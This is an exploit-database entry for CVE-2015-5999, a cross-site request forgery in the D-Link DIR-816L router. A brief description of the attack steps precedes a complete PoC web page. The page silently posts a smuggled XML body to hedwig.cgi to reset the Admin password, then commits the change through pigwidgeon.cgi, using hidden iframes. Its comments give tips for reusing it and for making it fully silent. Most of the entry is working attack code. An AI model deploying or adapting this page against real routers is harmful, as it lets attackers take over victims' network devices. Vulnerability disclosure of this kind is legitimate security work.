D-Link DIR-816L (Wireless Router) - Cross-Site Request Forgery (CVE-2015-5999)

2017-03-14T00:00:00
ID SSV:92774
Type seebug
Reporter Root
Modified 2017-03-14T00:00:00

Description

1) The victim logs in to the DIR-816L web interface (the PoC assumes the default LAN address 192.168.0.1) and keeps that authenticated session open

2) While still logged in, the victim visits the attacker's malicious web page (attacker.html)

3) attacker.html silently submits two cross-origin POSTs with the victim's session: a configuration update to hedwig.cgi that sets the Admin account password, followed by a commit (ACTIONS=SETCFG,SAVE,ACTIVATE) to pigwidgeon.cgi. Neither request carries an anti-CSRF token, so the admin password is changed to the attacker-chosen value ("password" in this PoC)

PoC video link: http://youtu.be/UBdR2sUc8Wg

                                        
                                            
                                                Exploit code (attacker.html):
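<!--
  CSRF PoC for D-Link DIR-816L (CVE-2015-5999): resets the Admin password.

  Mechanism (see the two forms below):
  * The first form posts to hedwig.cgi with enctype="text/plain", so the
    browser serialises the single field as literally "<name>=<value>".
    With the field name "<?xml version" and a value that starts with
    '"1.0" encoding="UTF-8"?>', the request body is a complete XML document
    whose DEVICE.ACCOUNT module sets the Admin account password to "password".
  * The second form posts ACTIONS=SETCFG,SAVE,ACTIVATE to pigwidgeon.cgi,
    which (judging by the action names) commits and activates the staged
    configuration.
  * Both requests rely only on the victim's browser attaching the existing
    router session; no anti-CSRF token is needed, which is the vulnerability.

  Notes for anyone re-using this PoC:
  * The value attribute MUST be single-quoted: the XML payload contains double
    quotes, and double-quoting the attribute truncates it to an empty string,
    so nothing but "<?xml version=" would be sent.
  * 192.168.0.1 is the router's default LAN address; change it if the target
    uses a different one.
  * The commit form is submitted immediately after the configuration form;
    the two requests are sent back-to-back and are expected to arrive in order.
  * The alert() is only there to make the demo visible; remove it for a
    silent test.
-->
<html>
<body>
<!-- hidden target frame so the hedwig.cgi response never becomes visible -->
<iframe style="display:none" name="hiddenpost"></iframe>
<form action="http://192.168.0.1/hedwig.cgi" method="POST" enctype="text/plain" target="hiddenpost" id="csrf">
<!-- name + "=" + value reassembles into a full XML document in the POST body -->
<input type="hidden" name="<?xml version" value='"1.0" encoding="UTF-8"?>
<postxml>
<module>
	<service>DEVICE.ACCOUNT</service>
	<device>
		<gw_name>DIR-816L</gw_name>
		
		<account>
			<seqno>1</seqno>
			<max>2</max>
			<count>1</count>
			<entry>
				<uid>USR-</uid>
				<name>Admin</name>
				<usrid/>
				<password>password</password>
				<group>0</group>
				<description/>
			</entry>
		</account>
		<group>
			<seqno/>
			<max/>
			<count>0</count>
		</group>
		<session>
			<captcha>1</captcha>
			<dummy/>
			<timeout>180</timeout>
			<maxsession>128</maxsession>
			<maxauthorized>16</maxauthorized>
		</session>
	</device>
</module>
<module>
	<service>HTTP.WAN-1</service>
	<inf>
		<web></web>
		<https_rport></https_rport>
		<stunnel>1</stunnel>
		<weballow>
			<hostv4ip/>
		</weballow>
		<inbfilter/>
	</inf>
	
</module>
<module>
	<service>HTTP.WAN-2</service>
	<inf>
		<active>0</active>
		<nat>NAT-1</nat>
		<web/>
		<weballow>
			<hostv4ip/>
		</weballow>
	</inf>
	
</module>
<module>
	<service>INBFILTER</service>
	<acl>
		<inbfilter>		
						<seqno>1</seqno>
			<max>24</max>
			<count>0</count>

		</inbfilter>		
	</acl>
	<ACTIVATE>ignore</ACTIVATE>
<FATLADY>ignore</FATLADY><SETCFG>ignore</SETCFG></module>
<module>
	<service>SHAREPORT</service>
	<FATLADY>ignore</FATLADY>
	
<ACTIVATE>ignore</ACTIVATE></module>
<module>
	<service>SAMBA</service>
	<samba>		
		    
		<enable>1</enable>
		<auth>1</auth>

    </samba>
</module>
</postxml>' />
</form>
<!-- step 1: stage the new configuration (password change) -->
<script>alert("This is CSRF PoC");document.getElementById("csrf").submit()</script>
<!-- hidden target frame for the commit response -->
<iframe style="display:none" name="hiddencommit"></iframe>
<!-- step 2: commit, save and activate the staged configuration -->
<form action="http://192.168.0.1/pigwidgeon.cgi" method="POST" target="hiddencommit" id="csrf1">
<input type="hidden" name="ACTIONS" value="SETCFG,SAVE,ACTIVATE" />
</form>
<script>document.getElementById("csrf1").submit()</script>
 
</body>
</html>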